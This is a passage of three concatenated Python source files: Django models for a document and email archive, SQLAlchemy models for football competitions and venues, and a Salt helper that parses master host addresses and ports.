                    (USER_RECVS_AT, 'Internal Receive #') ])
    __str__ = lambda self : self.number
    __unicode__ = __str__
###############################################################################
class MimeType(models.Model):
    """
    A MIME content type for an asset. This class exists simply to
    normalize the database.
    """
    # Commonly-used MIME type constants.
    # (The original declared TEXT twice; the duplicate was removed.)
    JPEG = 'image/jpeg'
    PNG = 'image/png'
    PDF = 'application/pdf'
    TEXT = 'text/plain'
    HTML = 'text/html'
    MAIL = 'message/rfc822'
    TIFF = 'image/tiff'
    BINARY = 'application/octet-stream'
    # Canonical MIME type name, e.g. 'image/png'.
    name = models.CharField(
        max_length = 64,
        blank = False,
        null = False,
        unique = True,
        db_index = True )
    # File-name extension used when materializing assets of this type.
    extension = models.CharField(
        max_length = 15,
        blank = True,
        null = False,
        db_index = True,
        unique = True )
    __str__ = lambda self : self.name
    __unicode__ = __str__
###############################################################################
class Process(models.Model):
    """ A type of process that can be performed on a document.
    For example:
        - import
        - split
        - normalize
        - ocr
        - index
    """
    # Unique slug identifying the process.
    name = models.SlugField(
        max_length = 64,
        unique = True,
        db_index = True,
        help_text = 'A unique identifier for this process.' )
    # MIME types this process can consume.
    mime_types = models.ManyToManyField(
        MimeType,
        related_name = 'consumers' )
    # A gateway process consumes no asset classes; ``inputs`` is the reverse
    # relation declared on AssetClass.consumers.
    is_gateway = property( lambda self: self.inputs.all().count() == 0 )
    __str__ = lambda self : self.name
    __unicode__ = __str__
###############################################################################
class Node(models.Model):
    """ A host participating in the document processing pipeline
    """
    # IP address of the host; one row per host.
    address = models.IPAddressField(
        unique = True,
        db_index = True )
    __str__ = lambda self : self.address
    __unicode__ = __str__
###############################################################################
class Processor(models.Model):
    """ An instance of a process type, given by the ip address on which the
    process is running.
    """
    process = models.ForeignKey(
        Process,
        related_name = 'processors')
    node = models.ForeignKey(
        Node,
        related_name = 'processors')
    # Human-readable identity, e.g. "ocr@10.0.2.110".
    name = property(
        lambda self: '%s@%s' % (self.process, self.node) )
    # Convenience pass-throughs to the underlying process's asset relations.
    inputs = property(
        lambda self : self.process.inputs )
    outputs = property(
        lambda self : self.process.outputs )
    __str__ = lambda self : self.name
    __unicode__ = __str__
###############################################################################
class TagManager( models.Manager ):
    """Manager with helpers for creating and pruning a user's Tag rows."""
    def get_or_create_from_label_list( self, owner, label_list ):
        """Return one Tag per label for *owner*, creating missing rows.

        Labels are normalized (stripped, lower-cased) before lookup.
        """
        tags = []
        for raw_label in label_list:
            tag, _created = self.get_or_create(
                owner = owner,
                label = raw_label.strip().lower() )
            tags.append(tag)
        return tags
    def delete_unused_tags( self, owner ):
        """Remove every tag of *owner* that no longer tags any document."""
        unused = self.filter(
            owner = owner,
            documents__isnull = True)
        unused.delete()
###############################################################################
class Tag(models.Model):
    """
    A user-owned label attached to documents (and, via reverse
    relations, to contacts and message aggregates). Unique per
    (owner, label).

    Note: in the original the docstring was a stray string literal
    placed after the constants, so the class had no real docstring.
    """
    # Well-known values for ``tag_class``.
    USER = 'user'
    UPLOAD_AGGREGATE = 'upload'
    MAIL_GMAIL_LABEL = 'mail/gmail-label'
    MAIL_IMAP_FOLDER = 'mail/imap-folder'
    MAIL_INBOX = 'mail/imap-inbox'
    MAIL_IMAP_FLAG_SEEN = 'mail/imap-flag/seen'
    objects = TagManager()
    owner = models.ForeignKey(
        User,
        related_name = 'tags')
    # Normalized label text (see TagManager.get_or_create_from_label_list).
    label = models.CharField(
        max_length = 64,
        blank = False,
        null = False,
        db_index = True )
    tag_class = models.CharField(
        max_length = 64,
        blank = True,
        default = '',
        db_index = True,
        help_text = 'Class of this tag' )
    date_created = models.DateTimeField(
        auto_now_add = True )
    date_last_modified = models.DateTimeField(
        auto_now = True )
    __str__ = lambda self : self.label
    __unicode__ = __str__
    class Meta:
        """ Constraints """
        unique_together = ( 'owner', 'label' )
###############################################################################
class Document(models.Model):
    """ A collection of pages """
    owner = models.ForeignKey(
        User,
        related_name = 'documents')
    title = models.CharField(
        max_length = 255,
        blank = True,
        default = '' )
    # Page count, derived from the reverse Page.document relation.
    num_pages = property(
        lambda self: self.pages.count() )
    # NOTE(review): ``symmetrical`` only applies to self-referential
    # ManyToManyFields; on this Tag relation it has no effect -- confirm
    # and consider dropping it.
    tags = models.ManyToManyField(
        Tag,
        related_name = 'documents',
        blank = True,
        symmetrical = True )
    __str__ = lambda self : self.title
    __unicode__ = __str__
    get_absolute_url = permalink(
        lambda self : ('document_info', (), { 'id' : self.pk }))
    class Meta:
        ordering = ('-title',)
###############################################################################
class Page(models.Model):
    """ A positional element of a document """
    owner = models.ForeignKey(
        User,
        related_name = 'pages')
    document = models.ForeignKey(
        Document,
        related_name = 'pages')
    # Position of the page within its document (base not enforced here).
    position = models.PositiveIntegerField()
    # "Title (position / total)" -- used by __str__.
    description = property(
        lambda self: '%s (%s / %s)' % (
            self.document.title,
            self.position,
            self.document.num_pages ))
    __str__ = lambda self : self.description
    __unicode__ = __str__
    get_absolute_url = permalink(
        lambda self : ('page_info', (), {'id': self.pk }))
    def get_asset(self, asset_class):
        """ Get an asset associated with this page """
        # E1101 = instance of 'Page' has no 'assets' member
        # pylint: disable-msg=E1101
        # Accept either an AssetClass instance or its name string.
        if isinstance(asset_class, AssetClass):
            return self.assets.get(asset_class__pk = asset_class.pk)
        else:
            return self.assets.get(asset_class__name = asset_class)
        # pylint: enable-msg=E1101
###############################################################################
class Contact(models.Model):
    """ A contact has a name and a set of email addresses.

    (The docstring was originally a stray string placed after the
    constants; it is now a real class docstring.)
    """
    # Values for the ``type`` field.
    BUSINESS = 1
    PERSON = 2
    owner = models.ForeignKey(
        User,
        related_name = 'contacts')
    name = models.CharField(max_length=128)
    type = models.IntegerField(default = PERSON)
    # NOTE(review): ``symmetrical`` only applies to self-referential M2M
    # fields; it has no effect on this Tag relation.
    tags = models.ManyToManyField(
        Tag,
        related_name = 'contacts',
        blank = True,
        symmetrical = True )
    # __str__ degrades non-ASCII characters to '?' for byte-string contexts.
    __str__ = lambda self : str(unicode(self).encode('ascii','replace'))
    __unicode__ = lambda self : unicode('%s (%s)' % (self.name, self.pk))
###############################################################################
class Address(models.Model):
    """ Email contact """
    # The email address itself is the primary key.
    email = models.EmailField(primary_key=True,
        blank = False)
    contact = models.ForeignKey(Contact,
        related_name = 'addresses')
    owner = models.ForeignKey(
        User,
        related_name = 'addresses')
    # Rendered as "Name <email>"; __str__ degrades non-ASCII to '?'.
    __str__ = lambda self : str(unicode(self).encode('ascii','replace'))
    __unicode__ = lambda self : unicode('%s <%s>' % (self.contact.name, self.email))
###############################################################################
class Message(models.Model):
    """ An email message belonging to a user.

    Linked to sender/recipient Address rows and, via the Asset model's
    ``related_message`` FK, to its stored parts.

    (The original docstring was a stray string literal placed after
    ``save``; it is now a real class docstring.)
    """
    # Lifecycle states for ``status``.
    STATUS_READY = 1 # fully-formed message, all assets are processed
    STATUS_DELETED = -1 # deleted message, assets are no longer accessible
    STATUS_REFERENCE = 0 # message created on the basis of a reference.
    # assets are not yet available
    def save(self, *args, **kwargs):
        """
        Overwriting save to set created_date and modified_date to utcnow()
        Django uses datetime.now()
        We want to store and transmit only UTC time, and localize it at rendering time
        """
        if not self.created_date:
            self.created_date = datetime.utcnow()
        self.modified_date = datetime.utcnow()
        super(Message, self).save(*args, **kwargs)
    # RFC 822 Message-ID header value.
    message_id = models.CharField(
        max_length = 512,
        blank = False,
        null = False,
        db_index = True)
    owner = models.ForeignKey(
        User,
        related_name = 'messages')
    subject = models.CharField(
        max_length = 512,
        blank = True,
        null = True)
    summary = models.CharField(
        max_length = 1024,
        blank = False,
        null = False)
    date = models.DateTimeField(null = True)
    modified_date = models.DateTimeField(null = True)
    created_date = models.DateTimeField(null = True)
    status = models.IntegerField()
    reply_to = models.ForeignKey('self',
        null = True,
        related_name = 'reply_messages')
    sender_address = models.ForeignKey(Address,
        null = True,
        related_name = 'sent_messages')
    # Not the same thing as to_address
    # to_address may be empty (in case of BCC or be set to the
    # address of a mailling list
    # mailbox address is the email address of one of the email
    # accounts for a given user
    mailbox_address = models.ForeignKey(Address,
        related_name = 'mailbox_messages')
    to_addresses = models.ManyToManyField(Address,
        blank = True,
        null = True,
        related_name = 'received_messages')
    cc_addresses = models.ManyToManyField(Address,
        blank = True,
        null = True,
        related_name = 'copied_messages')
    __str__ = lambda self : '%s (%s) on %s' % (self.message_id, self.subject, self.date)
    __unicode__ = __str__
    def get_asset(self, asset_class, mime_type):
        """ Get an asset associated with this message """
        # E1101 = instance of 'Message' has no 'assets' member
        # pylint: disable-msg=E1101
        logging.info('getting %s %s for Message %s (%s)' %(asset_class, mime_type, self, self.pk))
        if isinstance(asset_class, AssetClass):
            return self.assets.get(asset_class__pk = asset_class.pk,
                                   mime_type__name = mime_type)
        else:
            # ``matches`` (was ``all``) avoids shadowing the builtin.
            matches = self.assets.filter(asset_class__name = asset_class,
                                         mime_type__name = mime_type).all()
            logging.info(matches)
            if len(matches):
                return matches[0]
            else:
                logging.info('NO ASSET %s %s for Message %s (%s)' %(asset_class, mime_type, self, self.pk))
                return None
###############################################################################
class MessageRule(models.Model):
    """
    Classifies messages from a given sender address as belonging to a
    conversation or to a newsletter. MessageAggregate rows reference
    the rule that created them via their ``creator`` FK.
    """
    # Values for the ``type`` field.
    CONVERSATION = 1
    NEWSLETTER = 2
    owner = models.ForeignKey(
        User,
        related_name = 'message_rules')
    type = models.IntegerField(default = NEWSLETTER)
    sender_address = models.ForeignKey(Address,
        null = True,
        related_name = 'message_rules')
    # "<owner> N" for newsletters, "<owner> C" for conversations.
    __str__ = lambda self : str('%s %s' % (self.owner, (self.type ==
        MessageRule.NEWSLETTER and 'N' or 'C')))
    __unicode__ = __str__
###############################################################################
class MessageAggregate(models.Model):
    """ A Message aggregate is an ordered set of messages that match a
    particular criteria (built by a MessageRule)."""
    STATUS_READY = 1 # fully-formed aggregate
    STATUS_DELETED = -1 # deleted aggregate
    owner = models.ForeignKey(
        User,
        related_name = 'aggregates')
    # The rule that produced this aggregate.
    creator = models.ForeignKey(
        MessageRule,
        related_name = 'aggregates')
    messages = models.ManyToManyField(
        Message,
        related_name = 'aggregates',
        blank = True,
        symmetrical = True )
    tags = models.ManyToManyField(
        Tag,
        related_name = 'aggregates',
        blank = True,
        symmetrical = True )
    modified_date = models.DateTimeField(null = True, auto_now = True)
    created_date = models.DateTimeField(null = True, auto_now_add = True)
    status = models.IntegerField(default = STATUS_READY)
    def _get_latest_message(self):
        """Most recent message in the aggregate, or None when empty."""
        messages = self.messages.all().order_by('-date')
        if messages.count():
            return messages[0]
        else:
            return None
    latest_message = property(_get_latest_message)
    def _get_latest_sender(self):
        """Sender address of the latest message, or None when empty."""
        return self.latest_message and self.latest_message.sender_address or None
    latest_sender = property(_get_latest_sender)
    def _get_name_as_initial_subject(self):
        """Subject of the earliest message, used as the aggregate's name."""
        messages = self.messages.all().order_by('date')
        if messages.count():
            return messages[0].subject
        else:
            return ''
    name = property(_get_name_as_initial_subject)
    def _get_summary_of_latest_message(self):
        # NOTE(review): sorted ascending, so this returns the summary of the
        # EARLIEST message despite the name -- confirm whether '-date' was
        # intended (cf. _get_latest_message above).
        messages = self.messages.all().order_by('date')
        if messages.count():
            return messages[0].summary
        else:
            return ''
    summary = property(_get_summary_of_latest_message)
    # BUG FIX: the original read ``self.creator__type``; double-underscore
    # syntax is only query-filter syntax, not attribute access, so __str__
    # raised AttributeError at runtime. Use the real FK attribute instead.
    __str__ = lambda self : str('%s: %s' % (self.creator.type ==
        MessageRule.NEWSLETTER and 'N' or 'C',
        self.name))
    __unicode__ = __str__
###############################################################################
class AssetClass(models.Model):
    """
    A semantic tag on an document asset.
    """
    # Well-known asset class names.
    UPLOAD = 'upload'
    DOCUMENT = 'document'
    PAGE_ORIGINAL = 'original'
    PAGE_IMAGE = 'image'
    PAGE_THUMBNAIL = 'thumbnail'
    PAGE_BANNER = 'banner'
    PAGE_TEXT = 'text'
    MESSAGE_PART = 'message.part'
    name = models.CharField(
        max_length = 64,
        unique = True,
        db_index = True,
        help_text = 'Unique label for this asset class' )
    producers = models.ManyToManyField(
        Process,
        related_name = 'outputs',
        help_text = 'The processes that create this asset class' )
    consumers = models.ManyToManyField(
        Process,
        related_name = 'inputs',
        help_text = 'The processes that act on this asset class' )
    __str__ = lambda self : str(self.name)
    __unicode__ = __str__
    def has_consumers(self, mime_type):
        """ True if there is a consumer for assets of the given mime type """
        # ``mime_type`` may be a MimeType instance (filter on the relation
        # directly) or a name string (filter via mime_types__name).
        suffix = isinstance(mime_type, MimeType) and '' or '__name'
        return 0 != self.consumers.filter(
            ** { 'mime_types%s' % suffix : mime_type } ).count()
###############################################################################
class AssetManager(models.Manager):
    """Manager that normalizes string arguments passed to ``create``."""
    def create(self, **kwargs):
        """
        Create an Asset.

        ``asset_class`` and ``mime_type`` may be given as names (strings)
        instead of model instances, and ``file_name`` is accepted as an
        alias for ``orig_file_name``.
        """
        kwargs = kwargs.copy()
        asset_class = kwargs.get('asset_class')
        # BUG FIX: this is a Python 2 codebase (``unicode`` is used below in
        # this file); a bare ``str`` check missed unicode names, leaving the
        # raw string where an AssetClass/MimeType instance was required.
        if isinstance( asset_class, basestring):
            kwargs['asset_class'] = manager(AssetClass).get(name = asset_class)
        mime_type = kwargs.get('mime_type')
        if isinstance( mime_type, basestring):
            kwargs['mime_type'] = manager(MimeType).get_or_create(
                name = mime_type) [ 0 ]
        if 'file_name' in kwargs:
            kwargs.setdefault('orig_file_name', kwargs.pop('file_name'))
        return models.Manager.create(self, **kwargs)
###############################################################################
class Asset(models.Model):
    """
    A file object stored in the archive. Assets are tagged with one
    or more asset classes. Example assets include: uploads,
    thumbnails, ocr text, etc.
    """
    objects = AssetManager()
    owner = models.ForeignKey(
        User,
        related_name = 'assets' )
    # Processor that produced this asset, if any.
    producer = models.ForeignKey(
        Processor,
        null = True,
        default = None,
        related_name = 'created_assets')
    asset_class = models.ForeignKey(
        AssetClass,
        related_name = 'assets' )
    # Parent asset, when this asset was derived from another
    # (reverse relation: parent.children; see get_children below).
    parent = models.ForeignKey(
        'Asset',
        null = True,
        default = None,
        related_name = 'children')
    # Ordinal among siblings under ``parent`` (see Meta.unique_together).
    child_number = models.IntegerField()
    # Original file name as supplied at creation (see AssetManager.create).
    orig_file_name = models.CharField(
        max_length = 255,
        blank = True )
    mime_type = models.ForeignKey(
        MimeType,
        related_name = 'assets' )
    # Optional back-links to the object this asset belongs to.
    related_page = models.ForeignKey(
        Page,
        null = True,
        default = None,
        related_name = 'assets' )
    related_document = models.ForeignKey(
        Document,
        null = True,
        default = None,
        related_name = 'assets' )
    related_message = models.ForeignKey(
        Message,
        null = True,
        default = None,
        related_name = 'assets' )
    date_created = models.DateTimeField(
        auto_now_add = True )
    date_last_modified = models.DateTimeField(
        auto_now = True )
    # Synthesized storage name: "asset-<pk>-<class>.<extension>".
    file_name = property(
        lambda self: 'asset-%d-%s.%s' % (
            self.pk,
            self.asset_class,
            self.mime_type.extension ))
    # Key under which the asset is stored in S3.
    s3_key = property(
        lambda self: 'user_data/%d/assets/%s' % (
            self.owner.pk,
            self.pk ) )
    # ``description`` is simply repr(self) (see __repr__ below).
    description = property(repr)
    # Processes that can consume this asset (matching class AND mime type).
    consumers = property(
        lambda self: self.asset_class.consumers.filter(
            mime_types = self.mime_type ))
    __str__ = lambda self : self.file_name
    __unicode__ = __str__
    __repr__ = lambda self : \
        'Asset<' \
        'asset-id=%s, ' \
        'owner-id=%s, ' \
        'producer=%s, ' \
        'asset_class=%s, ' \
        'content_type=%s>' % (
            self.pk,
            self.owner.pk,
            self.producer,
            self.asset_class,
            self.mime_type )
    def get_children(self, asset_class):
        """Return child assets restricted to the named asset class."""
        return self.children.filter( asset_class__name = asset_class )
    class Meta:
        unique_together = [
            ( 'parent', 'asset_class', 'child_number'),
        ]
###############################################################################
class Query(models.Model):
    """
    A query that the user has previously run
    """
    owner = models.ForeignKey(
        User,
        related_name = 'queries')
    # Updated automatically on every save (auto_now).
    last_run = models.DateTimeField(
        db_index = True,
        auto_now = True)
    # Human-readable elapsed time, e.g. "3 days".
    since_last_run = property(lambda self : timesince(self.last_run))
    name = models.CharField(
        max_length = 64,
        blank = True,
        db_index = True)
    # The query text itself.
    value = models.CharField(
        max_length = 255,
        db_index = True)
    __str__ = lambda self : self.name
    __unicode__ = __str__
###############################################################################
class EncryptionKey(models.Model):
    """Per-user encryption key material (one row per user)."""
    owner = models.ForeignKey(
        User,
        unique = True,
        null = False,
        related_name = 'encryption_keys' )
    # Opaque key value; semantics not defined in this module.
    value = models.CharField(
        max_length = 64,
        blank = False,
        null = False )
    __str__ = lambda self : self.value
    __unicode__ = __str__
###############################################################################
class AccountClass(models.Model):
    """Kind of external account (e.g. Gmail vs. generic IMAP)."""
    # Well-known account class names.
    EMAIL_GMAIL = 'email/gmail'
    EMAIL_IMAP = 'email/imap'
    name = models.CharField(
        max_length = 64,
        blank = False,
        null = False )
    __str__ = lambda self : self.name
    __unicode__ = __str__
###############################################################################
class Account(models.Model):
    """An external (e.g. email) account owned by a user."""
    owner = models.ForeignKey(
        User,
        null = False,
        related_name = 'accounts' )
    # String primary key chosen by the application.
    id = models.CharField(
        max_length = 64,
        primary_key = True)
    account_class = models.ForeignKey(
        'AccountClass',
        null = True,
        default = None)
    name = models.CharField(
        max_length = 64,
        blank = False,
        null = False )
    # NOTE(review): credentials stored as plain CharField -- confirm whether
    # they are encrypted elsewhere (cf. EncryptionKey).
    password = models.CharField(
        max_length = 64,
        blank = True,
        null = False )
    server = models.CharField(
        max_length = 64,
        blank = True,
        null = False )
    # Whether to connect over SSL.
    ssl = models.BooleanField(
        blank = True,
        null = False )
    __str__ = lambda self : '%s of %s' % (self.name, self.owner.username)
    __unicode__ = __str__
| |
from datetime import date
from sqlalchemy import (case, select, cast, Column, Integer, Numeric, Date,
String, Sequence, ForeignKey, Unicode)
from sqlalchemy.orm import relationship, backref
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy.schema import CheckConstraint
from models.common import BaseSchema
import models.common.enums as enums
class Countries(BaseSchema):
    """
    Countries data model.
    Countries are defined as FIFA-affiliated national associations.
    """
    __tablename__ = "countries"
    # Surrogate key; id sequence starts at 100.
    id = Column(Integer, Sequence('country_id_seq', start=100), primary_key=True)
    name = Column(Unicode(60))
    # 3-letter code (called "trigram" in __repr__).
    code = Column(String(3))
    confederation = Column(enums.ConfederationType.db_type())
    def __repr__(self):
        # Python 2 style: returns UTF-8 encoded bytes.
        return u"<Country(id={0}, name={1}, trigram={2}, confed={3})>".format(
            self.id, self.name, self.code, self.confederation.value).encode('utf-8')
class Years(BaseSchema):
    """
    Years data model.
    """
    __tablename__ = "years"
    id = Column(Integer, Sequence('year_id_seq', start=100), primary_key=True)
    # Calendar year value; unique.
    yr = Column(Integer, unique=True)
    def __repr__(self):
        return "<Year(yr={0})>".format(self.yr)
class Seasons(BaseSchema):
    """
    Seasons data model.

    A season spans either one calendar year (start == end) or two
    consecutive years (European-style split seasons).
    """
    __tablename__ = "seasons"
    id = Column(Integer, Sequence('season_id_seq', start=100), primary_key=True)
    start_year_id = Column(Integer, ForeignKey('years.id'))
    end_year_id = Column(Integer, ForeignKey('years.id'))
    start_year = relationship('Years', foreign_keys=[start_year_id])
    end_year = relationship('Years', foreign_keys=[end_year_id])
    @hybrid_property
    def name(self):
        """
        List year(s) that make up season. Seasons over calendar year will be of form YYYY;
        seasons over two years will be of form YYYY-YYYY.
        """
        # NOTE(review): returns an int for single-year seasons but a str for
        # split seasons -- callers expecting a string should confirm.
        if self.start_year.yr == self.end_year.yr:
            return self.start_year.yr
        else:
            return "{0}-{1}".format(self.start_year.yr, self.end_year.yr)
    @name.expression
    def name(cls):
        """
        List year(s) that make up season. Seasons over calendar year will be of form YYYY;
        seasons over two years will be of form YYYY-YYYY.
        This expression allows `name` to be used as a query parameter.
        """
        # Scalar subqueries resolve the two Years rows; CASE suppresses the
        # "-YYYY" suffix when both years are equal.
        yr1 = select([Years.yr]).where(cls.start_year_id == Years.id).as_scalar()
        yr2 = select([Years.yr]).where(cls.end_year_id == Years.id).as_scalar()
        return cast(yr1, String) + case([(yr1 == yr2, '')], else_='-'+cast(yr2, String))
    @hybrid_property
    def reference_date(self):
        """
        Define the reference date that is used to calculate player ages.
        +------------------------+---------------------+
        | Season type            | Reference date      |
        +========================+=====================+
        | European (Split years) | 30 June             |
        +------------------------+---------------------+
        | Calendar-year          | 31 December         |
        +------------------------+---------------------+
        :return: Date object that expresses reference date.
        """
        if self.start_year.yr == self.end_year.yr:
            return date(self.end_year.yr, 12, 31)
        else:
            return date(self.end_year.yr, 6, 30)
    def __repr__(self):
        return "<Season({0})>".format(self.name)
class Competitions(BaseSchema):
    """
    Competitions common data model.

    Base of a single-table-inheritance hierarchy; the ``type`` column
    discriminates Domestic vs. International subclasses.
    """
    __tablename__ = 'competitions'
    id = Column(Integer, Sequence('competition_id_seq', start=1000), primary_key=True)
    name = Column(Unicode(80))
    # Competition tier (e.g. 1 for top flight).
    level = Column(Integer)
    discriminator = Column('type', String(20))
    __mapper_args__ = {
        'polymorphic_identity': 'competitions',
        'polymorphic_on': discriminator
    }
class DomesticCompetitions(Competitions):
    """
    Domestic Competitions data model, inherited from Competitions model.
    A domestic competition belongs to a single country.
    """
    __mapper_args__ = {'polymorphic_identity': 'domestic'}
    country_id = Column(Integer, ForeignKey('countries.id'))
    country = relationship('Countries', backref=backref('competitions'))
    def __repr__(self):
        return u"<DomesticCompetition(name={0}, country={1}, level={2})>".format(
            self.name, self.country.name, self.level).encode('utf-8')
class InternationalCompetitions(Competitions):
    """
    International Competitions data model, inherited from Competitions model.
    An international competition is tied to a confederation, not a country.
    """
    __mapper_args__ = {'polymorphic_identity': 'international'}
    confederation = Column(enums.ConfederationType.db_type())
    def __repr__(self):
        return u"<InternationalCompetition(name={0}, confederation={1})>".format(
            self.name, self.confederation.value).encode('utf-8')
class Venues(BaseSchema):
    """Match venues with geographic coordinates and country/timezone links."""
    __tablename__ = 'venues'
    id = Column(Integer, Sequence('venue_id_seq', start=1000), primary_key=True)
    name = Column(Unicode(60), doc="The name of the match venue")
    city = Column(Unicode(60), doc="Name of city/locality where venue resides")
    region = Column(Unicode(60), doc="Name of administrative region (state, province, etc) where venue resides")
    # Coordinate ranges are enforced by CHECK constraints.
    latitude = Column(Numeric(9, 6), CheckConstraint("latitude >= -90.000000 AND latitude <= 90.000000"),
                      default=0.000000, doc="Venue latitude in decimal degrees")
    longitude = Column(Numeric(9, 6), CheckConstraint("longitude >= -180.000000 AND longitude <= 180.000000"),
                       default=0.000000, doc="Venue longitude in decimal degrees")
    altitude = Column(Integer, CheckConstraint("altitude >= -200 AND altitude <= 4500"),
                      default=0, doc="Venue altitude in meters")
    country_id = Column(Integer, ForeignKey('countries.id'))
    country = relationship('Countries', backref=backref('venues'))
    timezone_id = Column(Integer, ForeignKey('timezones.id'))
    timezone = relationship('Timezones', backref=backref('venues'))
    def __repr__(self):
        return u"<Venue(name={0}, city={1}, country={2})>".format(
            self.name, self.city, self.country.name).encode('utf-8')
class VenueHistory(BaseSchema):
    """Dated configuration (pitch dimensions, capacity, surface) of a venue."""
    __tablename__ = 'venue_histories'
    id = Column(Integer, Sequence('venuehist_id_seq', start=10000), primary_key=True)
    date = Column(Date, doc="Effective date of venue configuration")
    # Dimension/capacity sanity bounds are enforced by CHECK constraints.
    length = Column(Integer, CheckConstraint("length >= 90 AND length <= 120"),
                    default=105, doc="Length of venue playing surface in meters")
    width = Column(Integer, CheckConstraint("width >= 45 AND width <= 90"),
                   default=68, doc="Width of venue playing surface in meters")
    capacity = Column(Integer, CheckConstraint("capacity >= 0"),
                      default=0, doc="Total venue capacity (seated and unseated)")
    seats = Column(Integer, CheckConstraint("seats >= 0"),
                   default=0, doc="Total seats at venue")
    venue_id = Column(Integer, ForeignKey('venues.id'))
    venue = relationship('Venues', backref=backref('histories'))
    surface_id = Column(Integer, ForeignKey('surfaces.id'))
    surface = relationship('Surfaces', backref=backref('venues'))
    def __repr__(self):
        return u"<VenueHistory(name={0}, date={1}, length={2}, width={3}, capacity={4})>".format(
            self.venue.name, self.date.isoformat(), self.length, self.width, self.capacity).encode('utf-8')
class Timezones(BaseSchema):
    """Time zone regions and their UTC offsets."""
    __tablename__ = 'timezones'
    id = Column(Integer, Sequence('timezone_id_seq', start=1000), primary_key=True)
    name = Column(Unicode(80), doc="Name of the time zone geographic region", nullable=False)
    offset = Column(Numeric(4, 2), doc="Offset of the time zone region from UTC, in decimal hours", nullable=False)
    confederation = Column(enums.ConfederationType.db_type())
    def __repr__(self):
        return u"<Timezone(name={0}, offset={1:+1.2f}, confederation={2})>".format(
            self.name, self.offset, self.confederation.value).encode('utf-8')
class Surfaces(BaseSchema):
    """Playing surface descriptions (e.g. grass, artificial)."""
    __tablename__ = 'surfaces'
    id = Column(Integer, Sequence('surface_id_seq', start=10), primary_key=True)
    description = Column(Unicode(60), nullable=False)
    type = Column(enums.SurfaceType.db_type())
    def __repr__(self):
        return u"<Surface(description={0}, type={1})>".format(
            self.description, self.type.description).encode('utf-8')
| |
"""
The daemons package is used to store implementations of the Salt Master and
Minion enabling different transports.
"""
import logging
import sys
from collections.abc import Iterable, Mapping, Sequence
log = logging.getLogger(__name__)
def is_non_string_iterable(obj):
    """
    Tell whether *obj* is iterable without being a ``str``.

    Strings are iterable, so they are excluded explicitly; everything
    else that satisfies the ``Iterable`` ABC qualifies. This mirrors the
    old Python 2 ``basestring`` exclusion in a Python 3 world.
    """
    if isinstance(obj, str):
        return False
    return isinstance(obj, Iterable)
def is_non_string_sequence(obj):
    """
    Tell whether *obj* is a sequence without being a ``str``.

    Strings are sequences, so they are excluded explicitly; everything
    else that satisfies the ``Sequence`` ABC qualifies. This mirrors the
    old Python 2 ``basestring`` exclusion in a Python 3 world.
    """
    if isinstance(obj, str):
        return False
    return isinstance(obj, Sequence)
def extract_masters(opts, masters="master", port=None, raise_if_empty=True):
    """
    Parses opts and generates a list of master (host,port) addresses.
    By default looks for list of masters in opts['master'] and uses
    opts['master_port'] as the default port when otherwise not provided.
    Use the opts key given by masters for the masters list, default is 'master'
    If parameter port is not None then uses the default port given by port
    Returns a list of host address dicts of the form
    [
        {
            'external': (host,port),
            'internal': (host, port)
        },
        ...
    ]
    When only one address is provided it is assigned to the external address field
    When not provided the internal address field is set to None.
    For a given master the syntax options are as follows:
        hostname [port]
        external: hostname [port]
        [internal: hostaddress [port]]
    Where the hostname string could be either an FQDN or host address
    in dotted number notation.
        master.example.com
        10.0.2.110
    And the hostadress is in dotted number notation
    The space delimited port is optional and if not provided a default is used.
    The internal address is optional and if not provided is set to None
    Examples showing the YAML in /etc/salt/master conf file:
    1) Single host name string (fqdn or dotted address)
        a)
            master: me.example.com
        b)
            master: localhost
        c)
            master: 10.0.2.205
    2) Single host name string with port
        a)
            master: me.example.com 4506
        b)
            master: 10.0.2.205 4510
    3) Single master with external and optional internal host addresses for nat
       in a dict
        master:
            external: me.example.com 4506
            internal: 10.0.2.100 4506
    3) One or host host names with optional ports in a list
        master:
            - me.example.com 4506
            - you.example.com 4510
            - 8.8.8.8
            - they.example.com 4506
            - 8.8.4.4 4506
    4) One or more host name with external and optional internal host addresses
       for Nat  in a list of dicts
        master:
            -
                external: me.example.com 4506
                internal: 10.0.2.100 4506
            -
                external: you.example.com 4506
                internal: 10.0.2.101 4506
            -
                external: we.example.com
            - they.example.com
    """
    if port is not None:
        master_port = opts.get(port)
    else:
        master_port = opts.get("master_port")
    try:
        master_port = int(master_port)
    except (TypeError, ValueError):
        # BUG FIX: a missing option yields None and ``int(None)`` raises
        # TypeError, which the original did not catch; ValueError covers
        # non-numeric text. Either way, fall through to the error below.
        master_port = None
    if not master_port:
        emsg = "Invalid or missing opts['master_port']."
        log.error(emsg)
        raise ValueError(emsg)
    # candidate entries may be a string, a mapping, or a list of either
    entries = opts.get(masters, [])
    if not entries:
        emsg = "Invalid or missing opts['{}'].".format(masters)
        log.error(emsg)
        if raise_if_empty:
            raise ValueError(emsg)
    hostages = []
    # extract candidate hostage (hostname dict) from entries
    if is_non_string_sequence(entries):  # multiple master addresses provided
        for entry in entries:
            if isinstance(entry, Mapping):  # mapping
                external = entry.get("external", "")
                internal = entry.get("internal", "")
                hostages.append(dict(external=external, internal=internal))
            elif isinstance(entry, str):  # string
                external = entry
                internal = ""
                hostages.append(dict(external=external, internal=internal))
    elif isinstance(entries, Mapping):  # mapping
        external = entries.get("external", "")
        internal = entries.get("internal", "")
        hostages.append(dict(external=external, internal=internal))
    elif isinstance(entries, str):  # string
        external = entries
        internal = ""
        hostages.append(dict(external=external, internal=internal))
    # now parse each hostname string for host and optional port
    masters = []
    for hostage in hostages:
        external = hostage["external"]
        internal = hostage["internal"]
        if external:
            external = parse_hostname(external, master_port)
            if not external:
                continue  # must have a valid external host address
            internal = parse_hostname(internal, master_port)
            masters.append(dict(external=external, internal=internal))
    return masters
def parse_hostname(hostname, default_port):
    """
    Split *hostname* into a ``(host, port)`` tuple.

    The expected format is a host optionally followed by a space and a
    port; when the port is absent, *default_port* is used. As a
    convenience, a single colon-delimited port ("host:port") is also
    recognized, but anything containing two or more colons is treated as
    an IPv6 literal and left untouched. Returns ``None`` for anything
    unparsable (non-string input, empty string, non-numeric port).
    """
    # Non-string input (e.g. None) has no .strip() -> unparsable.
    try:
        text = hostname.strip()
    except AttributeError:
        return None
    # Prefer the space-delimited form: everything after the last space
    # is the candidate port.
    candidate_host, _, candidate_port = text.rpartition(" ")
    if not candidate_port:
        # Empty input: nothing to parse at all.
        return None
    if not candidate_host:
        # No space present: the whole text is the host; use the default port.
        candidate_host, candidate_port = candidate_port, default_port
    if candidate_host.count(":") == 1:
